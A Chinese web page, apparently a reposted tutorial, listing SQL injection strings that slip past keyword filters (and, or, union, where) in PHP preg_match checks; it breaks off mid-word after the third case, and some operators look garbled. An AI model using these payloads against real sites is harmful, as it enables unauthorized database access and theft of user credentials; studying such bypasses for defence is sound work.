当前位置:主页   > 电脑数据库 > 正文
关于SQL注入绕过的一些知识点
来源:网络    作者:    时间:    
收藏此页】    【字号    】    【打印】    【关闭

一、 绕过waf思路

从第一步起,一点一点去分析,然后绕过。

1、过滤 and,or


preg_match('/(and/or)/i', $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 // 1 = 1 1 && 1 = 1

2、过滤 and, or, union


preg_match('/(and/or/union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 // (select user from users where user_id = 1) = 'admin'

3、过滤 and, or, union, where


preg_match('/(and/or/union/where)/i', $id)
Filtered injection: 1 // (select user from users wher..

其它资源
来源声明

版权与免责声明
1、本站所发布的文章仅供技术交流参考,本站不主张将其做为决策的依据,浏览者可自愿选择采信与否,本站不对因采信这些信息所产生的任何问题负责。
2、本站部分文章来源于网络,其版权为原权利人所有。由于来源之故,有的文章未能获得作者姓名,署“未知”或“佚名”。对于这些文章,有知悉作者姓名的请告知本站,以便及时署名。如果作者要求删除,我们将予以删除。除此之外本站不再承担其它责任。
3、本站部分文章来源于本站原创,本站拥有所有权利。
4、如对本站发布的信息有异议,请联系我们,经本站确认后,将在三个工作日内做出修改或删除处理。
请参阅权责声明